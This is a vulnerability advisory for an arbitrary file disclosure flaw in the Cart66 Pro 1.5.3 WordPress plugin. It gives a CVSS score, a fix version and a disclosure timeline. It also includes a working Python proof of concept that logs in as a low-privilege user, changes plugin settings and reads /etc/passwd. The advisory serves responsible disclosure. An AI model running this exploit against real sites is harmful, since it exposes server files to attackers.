Cart66 Pro 1.5.3, Arbitrary File Disclosure
Ability to change settings with a registered (non-admin) user allows us to trigger an Arbitrary File Disclosure vulnerability with any path of our choosing. One limitation with this vulnerability is that the target user (in the PoC, ‘test’) needs to have an account on the Cart66 installation.
Homepage
CVSS Score
3.5
CSSS Vector
(AV:N/AC:M/Au:S/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 1.5.4.
Proof of Concept
import requests
s = requests.session()
blog_url = 'http://localhost'
target_file = '/etc/passwd'
# Login to WordPress
url = '%s/wp-login.php'%blog_url
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
# Update plugin settings to allow exploitation
url = '%s/wp-admin/admin-ajax.php'%blog_url
payload = {
"action":"save_settings",
"product_folder":"/"
}
r = s.post(url, data=payload)
# Get contents of arbitrary file
url = '%s/?task=member_download&path=%s'%(blog_url,target_file)
r = s.get(url)
print r.textTimeline
- 2014-12-12: Discovered
- 2014-12-12: Vendor notified
- 2014-12-15: CVE Requested
- 2014-12-15: Vendor responded
- 2014-12-22: 1.5.4 released – issue resolved
- 2014-12-29: Advisory released
- 2015-01-05: CVE Assigned